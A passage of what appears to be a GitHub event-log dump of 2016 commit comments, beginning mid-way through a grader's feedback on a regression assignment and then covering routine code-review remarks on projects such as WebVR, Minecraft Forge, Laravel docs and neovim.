be useful for an outside observer to see what the variables you are considering represent. Being specific can help make your point later on. That said your construction of the linear regressor was well done. Use of the Ridge was also done interesting \r\n\r\n* Aside: with python being so easy to read it is not needed to have comments like `# set up the list to hold the different sets of coefficients` Comments should be reserved for why you chose a specific model/unexpected choices. *\r\n\r\n2.2 Don't see any removal of outliers or problem identification\r\n\r\n2.3 Very well done construction of your linear model!\r\n\r\n2.4 No cross validation was performed for this problem. Should be no trouble to implement, especially with your work with Lasso.\r\n\r\n2.5 From all of the visualizations I've seen so far for this section I'm incredibly happy looking at yours. Your graphs are labeled, clean, and include a title. Very well done!\r\n\r\n2.6 Didn't see a summarization of your hypothesis. Did you find evidence RP1PPTVAL was correlated to any of the present variables?\r\n\r\n2.2 R<sup>2</sup> versus MSE is the difference between R<sup>2</sup> is a way to look at the fit of a model  while the MSE looks at the variance that's present over the residuals. \r\n\r\n3.1 Didn't see a statement for your establishment of a hypothesis. That said you were able to construct all the requested Linear Regressions. Your values were very, very low. Why do you think that was? Your construction of the function of the ridge_lasso_cv_rsq was very interesting and well done, would be worth it to compare with sklearn's implementation of these functions! Again, your work with the visualization is very well done! \r\n\r\nYour project, like everyone's has some room for improvement. I would certainly suggest that as you do analysis in the future that you insert in markdown cells to explain your thought process and the outcome of your work. Use of a data dictionary is incredibly helpful in explaining what's going on and invaluable! Your programming very clearly, but you comment a bit excessively. Would suggest removing most of the comments under your functions in exchange for a doc string. Will be much more helpful. Do answer the bias variance trade off, it's a frequently asked question in interviews. "}},"created_at":"2016-09-13T05:20:02Z"}
{"id":"4553511007","type":"CommitCommentEvent","actor":{"login":"summerblue"},"repo":{"name":"daydaygo/laravel-docs"},"payload":{"comment":{"id":18996186,"position":27,"line":244,"path":"authentication.md","commit_id":"fa9061024cbefe534f6ea1c0a0a3e4781ef77537","created_at":"2016-09-13T05:20:43Z","updated_at":"2016-09-13T05:20:43Z","body":"    {提示}\r\n\r\n是不需要翻译的，是文档的自定义 Markdown 语法，后面也请一并修改了。"}},"created_at":"2016-09-13T05:20:43Z"}
{"id":"4553516253","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":18996197,"position":null,"line":null,"path":null,"commit_id":"1a8fd9d3a9a1fed6c3c884dbd6769b23372b2273","created_at":"2016-09-13T05:23:00Z","updated_at":"2016-09-13T05:23:00Z","body":"Wow, nice. \r\n\r\nJust thinking, I guess one downside to our high score system is that those scores disappear when the machine is removed.\r\n\r\nWith this stat tracking system, seems like we could add a points system to it if we wanted. Like, just multiply each stat by a number, then total them.\r\n\r\nDo you think we should have also added \"# of comments left\". Not sure why I didn't think of that one..."}},"created_at":"2016-09-13T05:23:00Z"}
{"id":"4553517174","type":"CommitCommentEvent","actor":{"login":"nick2170"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18996200,"position":10,"line":10,"path":"www/js/controller.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T05:23:22Z","updated_at":"2016-09-13T05:23:22Z","body":"I have to use == because the jquery .val() returns a var without a specific type so it ends up being 'true' or 'false'\r\ncomparing the .val() with === doesnt return the correct type however == works as expected. \r\nIt's the same reason that i have to use parseInt to convert the val() to a number."}},"created_at":"2016-09-13T05:23:22Z"}
{"id":"4553518482","type":"CommitCommentEvent","actor":{"login":"nick2170"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18996205,"position":5,"line":16,"path":"lib/BuzzerServer.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T05:23:56Z","updated_at":"2016-09-13T05:23:56Z","body":"woops! I'll revert this and exclude it from future commits"}},"created_at":"2016-09-13T05:23:56Z"}
{"id":"4553520357","type":"CommitCommentEvent","actor":{"login":"pitiphong-p"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18996214,"position":null,"line":null,"path":null,"commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T05:24:47Z","updated_at":"2016-09-13T05:24:47Z","body":"Cool!!! I just want to validate the design. If you guys are ok with this design then I will refactor and review my codes and create a PR for this :)"}},"created_at":"2016-09-13T05:24:47Z"}
{"id":"4553520841","type":"CommitCommentEvent","actor":{"login":"thanhdiepts"},"repo":{"name":"thanhdiepts/bearDropper-uclient-fetch"},"payload":{"comment":{"id":18996216,"position":null,"line":null,"path":null,"commit_id":"24bc3e14b8614025fd6f25db4d1d4741798e34dd","created_at":"2016-09-13T05:25:01Z","updated_at":"2016-09-13T05:25:01Z","body":"replace wget by uclient-fetch on trunk version"}},"created_at":"2016-09-13T05:25:01Z"}
{"id":"4553521282","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18996217,"position":21,"line":681,"path":"index.bs","commit_id":"1328cc7af2049aa0ce116755ce8a4f7cc51582a4","created_at":"2016-09-13T05:25:13Z","updated_at":"2016-09-13T05:25:13Z","body":"can we link to or back-tick `Document`?"}},"created_at":"2016-09-13T05:25:13Z"}
{"id":"4553522123","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18996219,"position":24,"line":684,"path":"index.bs","commit_id":"1328cc7af2049aa0ce116755ce8a4f7cc51582a4","created_at":"2016-09-13T05:25:33Z","updated_at":"2016-09-13T05:25:33Z","body":"`which` should be `that`"}},"created_at":"2016-09-13T05:25:33Z"}
{"id":"4553522369","type":"CommitCommentEvent","actor":{"login":"pitiphong-p"},"repo":{"name":"chakrit/omise-swift"},"payload":{"comment":{"id":18996220,"position":7,"line":18,"path":"OmiseSwift/Endpoint.swift","commit_id":"23d225604247e25e5af7943c04ff2d66c228e4fe","created_at":"2016-09-13T05:25:40Z","updated_at":"2016-09-13T05:25:40Z","body":"What you said is doable in Swift 3 but\r\nhttps://github.com/apple/swift-evolution/blob/master/proposals/0042-flatten-method-types.md\r\nAwaiting implementation orz"}},"created_at":"2016-09-13T05:25:40Z"}
{"id":"4553525584","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18996224,"position":26,"line":686,"path":"index.bs","commit_id":"1328cc7af2049aa0ce116755ce8a4f7cc51582a4","created_at":"2016-09-13T05:27:03Z","updated_at":"2016-09-13T05:27:03Z","body":"does this not work with Bikeshed syntax?\r\n\r\n    ```js\r\n    <body>\r\n      <p>This iframe is allowed to use VR features.</p>\r\n      <iframe src=\"https://vr.example.com/embed?id=67445\" allowvr\"></iframe>\r\n    </body>\r\n    ```\r\n"}},"created_at":"2016-09-13T05:27:03Z"}
{"id":"4553525672","type":"CommitCommentEvent","actor":{"login":"preethi29"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":18996225,"position":null,"line":null,"path":null,"commit_id":"4268b44abde41948a4c8b92b358505fcff0cc9a9","created_at":"2016-09-13T05:27:05Z","updated_at":"2016-09-13T05:27:05Z","body":"@dkayiwa is this commit not available yet in 2.0 release? Also 'identifierTypes' variable looks unused in this method."}},"created_at":"2016-09-13T05:27:05Z"}
{"id":"4553526027","type":"CommitCommentEvent","actor":{"login":"scottwainstock"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":18996226,"position":null,"line":null,"path":null,"commit_id":"1a8fd9d3a9a1fed6c3c884dbd6769b23372b2273","created_at":"2016-09-13T05:27:14Z","updated_at":"2016-09-13T05:27:14Z","body":"I can add a # comments thing, sure. And, I have some code coming that\nshould fix the \"scores disappear\" thing. That's basically a bug right now.\nIf you delete the LMX associated with a high score, the profile page will\nerror.\n\nSo, I'll fix that.\n\nOn Mon, Sep 12, 2016 at 10:23 PM, RyanTG <notifications@github.com> wrote:\n\n> Wow, nice.\n>\n> Just thinking, I guess one downside to our high score system is that those\n> scores disappear when the machine is removed.\n>\n> With this stat tracking system, seems like we could add a points system to\n> it if we wanted. Like, just multiply each stat by a number, then total them.\n>\n> Do you think we should have also added \"# of comments left\". Not sure why\n> I didn't think of that one...\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/scottwainstock/pbm/commit/1a8fd9d3a9a1fed6c3c884dbd6769b23372b2273#commitcomment-18996197>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAK-LS9W16_qBIVyxkDdZAXCS4S1he3gks5qpjM0gaJpZM4J7TVp>\n> .\n>\n"}},"created_at":"2016-09-13T05:27:14Z"}
{"id":"4553526770","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18996228,"position":5,"line":576,"path":"index.bs","commit_id":"1328cc7af2049aa0ce116755ce8a4f7cc51582a4","created_at":"2016-09-13T05:27:32Z","updated_at":"2016-09-13T05:27:32Z","body":"`attribute set` to `attribute, then set`"}},"created_at":"2016-09-13T05:27:32Z"}
{"id":"4553527731","type":"CommitCommentEvent","actor":{"login":"archen1"},"repo":{"name":"archen1/html"},"payload":{"comment":{"id":18996230,"position":7,"line":7,"path":"html1","commit_id":"9d6f39070231f7beabd0d0e193524ebbc59977ed","created_at":"2016-09-13T05:27:55Z","updated_at":"2016-09-13T05:27:55Z","body":"hhaha"}},"created_at":"2016-09-13T05:27:55Z"}
{"id":"4553528557","type":"CommitCommentEvent","actor":{"login":"cvan"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18996231,"position":5,"line":576,"path":"index.bs","commit_id":"1328cc7af2049aa0ce116755ce8a4f7cc51582a4","created_at":"2016-09-13T05:28:16Z","updated_at":"2016-09-13T05:28:16Z","body":"`set the returned Promise MUST be rejected` -> shouldn't that just be `the Promise MUST be rejected`?"}},"created_at":"2016-09-13T05:28:16Z"}
{"id":"4553529007","type":"CommitCommentEvent","actor":{"login":"artmissfowl"},"repo":{"name":"artmissfowl/Web01.ir"},"payload":{"comment":{"id":18996232,"position":4,"line":11,"path":"web01.html","commit_id":"396f3afbaf98f21c1134af0bca15122e4d1025bd","created_at":"2016-09-13T05:28:26Z","updated_at":"2016-09-13T05:28:26Z","body":"Sepehr man in khat ro motevajeh nashodam chera ino neveshti"}},"created_at":"2016-09-13T05:28:26Z"}
{"id":"4553529251","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":18996233,"position":null,"line":null,"path":null,"commit_id":"2f2a99c993031318c1ac6e43ea3a9b263e065e0d","created_at":"2016-09-13T05:28:32Z","updated_at":"2016-09-13T05:28:32Z","body":"Related to: backdrop/backdrop-issues#1361 "}},"created_at":"2016-09-13T05:28:32Z"}
{"id":"4553529490","type":"CommitCommentEvent","actor":{"login":"Windyronnie"},"repo":{"name":"Windyronnie/Demo"},"payload":{"comment":{"id":18996236,"position":null,"line":null,"path":null,"commit_id":"095cb11ebb60a4111610b64e21bbd266fa1c4237","created_at":"2016-09-13T05:28:37Z","updated_at":"2016-09-13T05:28:37Z","body":"ado.net+mvc DataTable To List<T>"}},"created_at":"2016-09-13T05:28:37Z"}
{"id":"4553530266","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"KimWanGak/ZzayoZaayo_1"},"payload":{"comment":{"id":18996241,"position":null,"line":null,"path":null,"commit_id":"166b2cef0a79ad92f5045b68ceaefea9ac9cb3ed","created_at":"2016-09-13T05:28:56Z","updated_at":"2016-09-13T05:28:56Z","body":"2013244012 김완각!"}},"created_at":"2016-09-13T05:28:56Z"}
{"id":"4553531484","type":"CommitCommentEvent","actor":{"login":"DarkGuardsman"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18996246,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T05:29:26Z","updated_at":"2016-09-13T05:29:26Z","body":"This is rather light weight good job, but it needs some kind of sided system if it is planned to be applied to Tiles. I recommend creating an Interface called [IEnergyStorageProvider](https://github.com/BuiltBrokenModding/VoltzEngine-API/blob/master/energy/IEnergyBufferProvider.java) that has a method IEnergyStorage getEntityStorage(side). This will solve the sided access limitation and not require the IEnergyStorage interface be applied to the tile itself. Making the API more flexible to how modders like to handle their code.\r\n\r\nAs well as a second recommendation adding a side param to each of the methods in the interface would also help. This way more data can be passed into the object to tell it where power is coming from."}},"created_at":"2016-09-13T05:29:26Z"}
{"id":"4553532177","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu-book"},"payload":{"comment":{"id":18996250,"position":null,"line":null,"path":null,"commit_id":"ca36a1c6d774805297aa60a82dcfd30166f30687","created_at":"2016-09-13T05:29:43Z","updated_at":"2016-09-13T05:29:43Z","body":"上記ご指摘頂いたように以下の内容へ修正します。\r\nまた、口頭にてご指摘頂きましたhandwrittenの件についてもhard-codeに修正します。\r\n```\r\nThis patch modifies include source path to the source file of Ryu.\r\nAnd modifies to include the hard-code sources.\r\n```"}},"created_at":"2016-09-13T05:29:43Z"}
{"id":"4553532232","type":"CommitCommentEvent","actor":{"login":"Octoberr"},"repo":{"name":"tanteng/learn-python"},"payload":{"comment":{"id":18996251,"position":null,"line":null,"path":null,"commit_id":"cd5ff8f01bdab7a8065d18c072676dd2af5a3d0b","created_at":"2016-09-13T05:29:44Z","updated_at":"2016-09-13T05:29:44Z","body":"hello! i want to ask a question,How to store data in other places? "}},"created_at":"2016-09-13T05:29:44Z"}
{"id":"4553535439","type":"CommitCommentEvent","actor":{"login":"dcai"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":18996257,"position":null,"line":null,"path":null,"commit_id":"bb76f24af2010943387ce696a7092175b4ecccf2","created_at":"2016-09-13T05:31:02Z","updated_at":"2016-09-13T05:31:02Z","body":"Yeah!! 🎆 "}},"created_at":"2016-09-13T05:31:02Z"}
{"id":"4553537034","type":"CommitCommentEvent","actor":{"login":"felixbarny"},"repo":{"name":"p6spy/p6spy"},"payload":{"comment":{"id":18996260,"position":null,"line":null,"path":null,"commit_id":"8184bd6e6739e37850f5f1242390b586a25009f5","created_at":"2016-09-13T05:31:43Z","updated_at":"2016-09-13T05:31:43Z","body":"I dont quite get what needs to be initialized and where it is needed. "}},"created_at":"2016-09-13T05:31:43Z"}
{"id":"4553540245","type":"CommitCommentEvent","actor":{"login":"Johnkui"},"repo":{"name":"lovesunstar/STKit"},"payload":{"comment":{"id":18996263,"position":null,"line":null,"path":null,"commit_id":"b03bf8faba65494e3c952d695d7127cc72f3908a","created_at":"2016-09-13T05:33:02Z","updated_at":"2016-09-13T05:33:02Z","body":"试了下，这个问题可以通过维护一个全局的weak的NSMapTable来跟踪assign类型的关联对象来解决"}},"created_at":"2016-09-13T05:33:02Z"}
{"id":"4553540331","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18996264,"position":null,"line":null,"path":null,"commit_id":"b2eb75907a2de3d1a515ce02abcc3ca43008e001","created_at":"2016-09-13T05:33:05Z","updated_at":"2016-09-13T05:33:05Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b2eb75907a2de3d1a515ce02abcc3ca43008e001-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b2eb75907a2de3d1a515ce02abcc3ca43008e001-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T05:33:05Z"}
{"id":"4553540705","type":"CommitCommentEvent","actor":{"login":"rolfbjarne"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":18996265,"position":7,"line":222,"path":"Make.config","commit_id":"7ee469b0ee02cf451a867ccc2b2c04bbece45b82","created_at":"2016-09-13T05:33:12Z","updated_at":"2016-09-13T05:33:12Z","body":"You might want to add the new submodule here too: https://github.com/xamarin/xamarin-macios/blob/dfc3f7f523f8acc2dc22af26741c5603ec179c47/mk/versions.mk#L60 so that the version is checked on every build."}},"created_at":"2016-09-13T05:33:12Z"}
{"id":"4553540880","type":"CommitCommentEvent","actor":{"login":"daydaygo"},"repo":{"name":"daydaygo/laravel-docs"},"payload":{"comment":{"id":18996266,"position":27,"line":244,"path":"authentication.md","commit_id":"fa9061024cbefe534f6ea1c0a0a3e4781ef77537","created_at":"2016-09-13T05:33:15Z","updated_at":"2016-09-13T05:33:15Z","body":"已修改"}},"created_at":"2016-09-13T05:33:15Z"}
{"id":"4553541041","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"HwanHee-Lee/ZzayoZaayo_1"},"payload":{"comment":{"id":18996267,"position":null,"line":null,"path":null,"commit_id":"166b2cef0a79ad92f5045b68ceaefea9ac9cb3ed","created_at":"2016-09-13T05:33:19Z","updated_at":"2016-09-13T05:33:19Z","body":"여기다코멘트다는거맞죠??"}},"created_at":"2016-09-13T05:33:19Z"}
{"id":"4553541780","type":"CommitCommentEvent","actor":{"login":"pleb"},"repo":{"name":"damoclark/buzzer.click"},"payload":{"comment":{"id":18996270,"position":10,"line":10,"path":"www/js/controller.js","commit_id":"9b160720db59399ff5fa14cafc2c53dc746e5fa8","created_at":"2016-09-13T05:33:36Z","updated_at":"2016-09-13T05:33:36Z","body":"actually, jquery.val should only return a string. === should work. I could be wrong though..."}},"created_at":"2016-09-13T05:33:36Z"}
{"id":"4553542947","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":18996271,"position":null,"line":null,"path":null,"commit_id":"d54915ff1df3e52c4c7256f09bf4a4f2f12fd91f","created_at":"2016-09-13T05:34:04Z","updated_at":"2016-09-13T05:34:04Z","body":"Fixes #6"}},"created_at":"2016-09-13T05:34:04Z"}
{"id":"4553543462","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":18996273,"position":null,"line":null,"path":null,"commit_id":"fb6f23b8f08e8adff90532a764147262fef5bff3","created_at":"2016-09-13T05:34:15Z","updated_at":"2016-09-13T05:34:15Z","body":"Fixes #6"}},"created_at":"2016-09-13T05:34:15Z"}
{"id":"4553543807","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":18996274,"position":null,"line":null,"path":null,"commit_id":"7a6f22399cf8decbd67d78b6362ef7f87c5a47ab","created_at":"2016-09-13T05:34:24Z","updated_at":"2016-09-13T05:34:24Z","body":"Fixes #6"}},"created_at":"2016-09-13T05:34:24Z"}
{"id":"4553545308","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"BenzoRoms/frameworks_base"},"payload":{"comment":{"id":18996278,"position":null,"line":null,"path":null,"commit_id":"925fb6669fd3375258dcd452b212f8629d70fcde","created_at":"2016-09-13T05:35:01Z","updated_at":"2016-09-13T05:35:01Z","body":"It's not work for me. What about you?\r\nAlso weather in statusbar doesn't work. I got it from CM"}},"created_at":"2016-09-13T05:35:01Z"}
{"id":"4553545424","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":18996279,"position":null,"line":null,"path":null,"commit_id":"367068640590d8012eefef7b57c4c5d4344f4db7","created_at":"2016-09-13T05:35:04Z","updated_at":"2016-09-13T05:35:04Z","body":"Fixes #12"}},"created_at":"2016-09-13T05:35:04Z"}
{"id":"4553546370","type":"CommitCommentEvent","actor":{"login":"LexManos"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18996282,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T05:35:25Z","updated_at":"2016-09-13T05:35:25Z","body":"Umm, No. It's a capability which is inherently sided."}},"created_at":"2016-09-13T05:35:25Z"}
{"id":"4553546382","type":"CommitCommentEvent","actor":{"login":"toji"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18996283,"position":26,"line":686,"path":"index.bs","commit_id":"1328cc7af2049aa0ce116755ce8a4f7cc51582a4","created_at":"2016-09-13T05:35:26Z","updated_at":"2016-09-13T05:35:26Z","body":"Just tried it. Apparently not. :P"}},"created_at":"2016-09-13T05:35:26Z"}
{"id":"4553547644","type":"CommitCommentEvent","actor":{"login":"MrCsabaToth"},"repo":{"name":"gdgfresno/valleydevfest"},"payload":{"comment":{"id":18996286,"position":null,"line":null,"path":null,"commit_id":"f9e7d88a4c3cdeca4a33d63d96261b897bfde07e","created_at":"2016-09-13T05:35:52Z","updated_at":"2016-09-13T05:35:52Z","body":"Fixes #10"}},"created_at":"2016-09-13T05:35:52Z"}
{"id":"4553549558","type":"CommitCommentEvent","actor":{"login":"pauljoda"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18996288,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T05:36:32Z","updated_at":"2016-09-13T05:36:32Z","body":"That isn't needed. Get capability is sided. To get the capability object\nyou pass a face. It is up to the modder to return if that face allows the\ncapability to be accessed. Check the forge docs for more info\n\nOn Tue, Sep 13, 2016, 12:29 AM Robert WC Seifert <notifications@github.com>\nwrote:\n\n> This is rather light weight good job, but it needs some kind of sided\n> system if it is planned to be applied to Tiles. I recommend creating an\n> Interface called IEnergyStorageProvider\n> <https://github.com/BuiltBrokenModding/VoltzEngine-API/blob/master/energy/IEnergyBufferProvider.java>\n> that has a method IEnergyStorage getEntityStorage(side). This will solve\n> the sided access limitation and not require the IEnergyStorage interface be\n> applied to the tile itself. Making the API more flexible to how modders\n> like to handle their code.\n>\n> As well as a second recommendation adding a side param to each of the\n> methods in the interface would also help. This way more data can be passed\n> into the object to tell it where power is coming from.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MinecraftForge/MinecraftForge/commit/45097fed0c054407dedcf4cb9bab0e54b977d7e7#commitcomment-18996246>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADDSLbygNyTgodLKKBS1eSsvXDGESBO9ks5qpjTBgaJpZM4J7KFm>\n> .\n>\n"}},"created_at":"2016-09-13T05:36:32Z"}
{"id":"4553549653","type":"CommitCommentEvent","actor":{"login":"KimWanGak"},"repo":{"name":"KimWanGak/Gak2"},"payload":{"comment":{"id":18996290,"position":null,"line":null,"path":null,"commit_id":"166b2cef0a79ad92f5045b68ceaefea9ac9cb3ed","created_at":"2016-09-13T05:36:36Z","updated_at":"2016-09-13T05:36:36Z","body":"여긴가"}},"created_at":"2016-09-13T05:36:36Z"}
{"id":"4553550285","type":"CommitCommentEvent","actor":{"login":"DarkGuardsman"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":18996291,"position":null,"line":null,"path":null,"commit_id":"45097fed0c054407dedcf4cb9bab0e54b977d7e7","created_at":"2016-09-13T05:36:50Z","updated_at":"2016-09-13T05:36:50Z","body":"Ya, ignore my comment I just read up on the capability system and now feel a bit stupid. Still working in 1.7.10 and just noticed no additional interface in the same package for it :/"}},"created_at":"2016-09-13T05:36:50Z"}
{"id":"4553551730","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18996294,"position":null,"line":null,"path":null,"commit_id":"54fbae6b6504519869f3bbc2fe6997df42432441","created_at":"2016-09-13T05:37:25Z","updated_at":"2016-09-13T05:37:25Z","body":"I thought so too. But most of them were producing clean dupes, so if you produced 1500 you would load 1500 (of 3000) and not notice."}},"created_at":"2016-09-13T05:37:25Z"}
{"id":"4553551943","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"AlmuraDev/Almura"},"payload":{"comment":{"id":18996295,"position":12,"line":512,"path":"src/main/java/com/almuradev/almura/CommonProxy.java","commit_id":"7f126fff893306c0b1e86e066a364b8dc910c2e4","created_at":"2016-09-13T05:37:31Z","updated_at":"2016-09-13T05:37:31Z","body":"Actually again who is this?"}},"created_at":"2016-09-13T05:37:31Z"}
{"id":"4553552933","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18996297,"position":null,"line":null,"path":null,"commit_id":"54fbae6b6504519869f3bbc2fe6997df42432441","created_at":"2016-09-13T05:37:56Z","updated_at":"2016-09-13T05:37:56Z","body":"The mysqlna would only be wrong if we wanted some other output format"}},"created_at":"2016-09-13T05:37:56Z"}
{"id":"4553554725","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/frameworks_base"},"payload":{"comment":{"id":18996299,"position":null,"line":null,"path":null,"commit_id":"925fb6669fd3375258dcd452b212f8629d70fcde","created_at":"2016-09-13T05:38:40Z","updated_at":"2016-09-13T05:38:40Z","body":"Yeah it works for me. I don't know about weather in statusbar as I don't have it."}},"created_at":"2016-09-13T05:38:40Z"}
{"id":"4553554744","type":"CommitCommentEvent","actor":{"login":"hayco"},"repo":{"name":"HuygensING/langident"},"payload":{"comment":{"id":18996300,"position":null,"line":null,"path":null,"commit_id":"1b6749e190743ac78da0a45b893f5bad5c35886c","created_at":"2016-09-13T05:38:41Z","updated_at":"2016-09-13T05:38:41Z","body":"Actually, this now hides the complexity that we *have* this version \"thingy\". It introduces a dependency on LangIdentApp's static internals.\r\n\r\nFrom a testing perspective it makes it hard to test that LangIdentResource actually returns the correct version, as it now plucks it straight from LangIdentApp's internals, where it is initialised in a static code block. Passing it in as a constructor param makes it easy to write a test to check that the correct version is returned. And it keeps it simple, should we upgrade our versioning to, e.g. a VersionFactory delegate.\r\n\r\nI am strongly in favor of keeping the version as a constructor parameter so that we *clearly see* that we are paying a price for having this versioning."}},"created_at":"2016-09-13T05:38:41Z"}
{"id":"4553556496","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18996303,"position":null,"line":null,"path":null,"commit_id":"37e828c3e016d9c7105e22da76123017a2cdff48","created_at":"2016-09-13T05:39:21Z","updated_at":"2016-09-13T05:39:21Z","body":"@xfurry i dont think there is something bad from that commit. But i may be wrong i dont fully understaind Vmap. However iam sure there is a problem on your side because this patch is applied in all 3 cores and i have not that kind of message in any of them. Also at least @Grz3s and @Phatcat confirmed they have not too.\r\n\r\nSo i see no reason to revert it even if the issue you have is revealed right after it. The message you have clearly state that you send bad coord to getObjectHitPos. Try debug it and see if its not related to some worldobject in your db or such."}},"created_at":"2016-09-13T05:39:21Z"}
{"id":"4553556825","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"BenzoRoms/frameworks_base"},"payload":{"comment":{"id":18996305,"position":null,"line":null,"path":null,"commit_id":"925fb6669fd3375258dcd452b212f8629d70fcde","created_at":"2016-09-13T05:39:29Z","updated_at":"2016-09-13T05:39:29Z","body":"What player do you use?"}},"created_at":"2016-09-13T05:39:29Z"}
{"id":"4553557639","type":"CommitCommentEvent","actor":{"login":"trusktr"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18996307,"position":24,"line":2362,"path":"src/nvim/normal.c","commit_id":"c6f5d6b7e0f274a245cecd80c480212d399df9d4","created_at":"2016-09-13T05:39:48Z","updated_at":"2016-09-13T05:39:48Z","body":"Oh okay, cool! The line `if (in_tab_line) {` was just confusing, as if it movement was applied only when the mouse had to be in the tab line, that's all. nvm then!"}},"created_at":"2016-09-13T05:39:48Z"}
{"id":"4553558035","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRoms/frameworks_base"},"payload":{"comment":{"id":18996308,"position":null,"line":null,"path":null,"commit_id":"925fb6669fd3375258dcd452b212f8629d70fcde","created_at":"2016-09-13T05:39:58Z","updated_at":"2016-09-13T05:39:58Z","body":"Google Music"}},"created_at":"2016-09-13T05:39:58Z"}
{"id":"4553560133","type":"CommitCommentEvent","actor":{"login":"toji"},"repo":{"name":"w3c/webvr"},"payload":{"comment":{"id":18996311,"position":5,"line":576,"path":"index.bs","commit_id":"1328cc7af2049aa0ce116755ce8a4f7cc51582a4","created_at":"2016-09-13T05:40:37Z","updated_at":"2016-09-13T05:40:37Z","body":"> attribute set to attribute, then set\r\n\r\nI disagree, but I see why you say that. The meaning here is:\r\n\r\n* Check if the iframe has the allowvr attribute set.\r\n* If not, reject the promise.\r\n\r\nI'll see if it can be worded clearer. (A lot of the verbiage here is from the WHATWG fullscreen spec.)"}},"created_at":"2016-09-13T05:40:37Z"}
{"id":"4553560266","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"BenzoRoms/frameworks_base"},"payload":{"comment":{"id":18996313,"position":null,"line":null,"path":null,"commit_id":"925fb6669fd3375258dcd452b212f8629d70fcde","created_at":"2016-09-13T05:40:39Z","updated_at":"2016-09-13T05:40:39Z","body":"Can you test it on AIMP or PowerAMP?"}},"created_at":"2016-09-13T05:40:39Z"}
{"id":"4553562715","type":"CommitCommentEvent","actor":{"login":"MKP9"},"repo":{"name":"MKP9/llama-zappos"},"payload":{"comment":{"id":18996321,"position":null,"line":null,"path":null,"commit_id":"8d2bb4bf28d45a875a4c7d848a6eb6678db23d0d","created_at":"2016-09-13T05:41:35Z","updated_at":"2016-09-13T05:41:35Z","body":"Zip file of llama page for zappos."}},"created_at":"2016-09-13T05:41:35Z"}
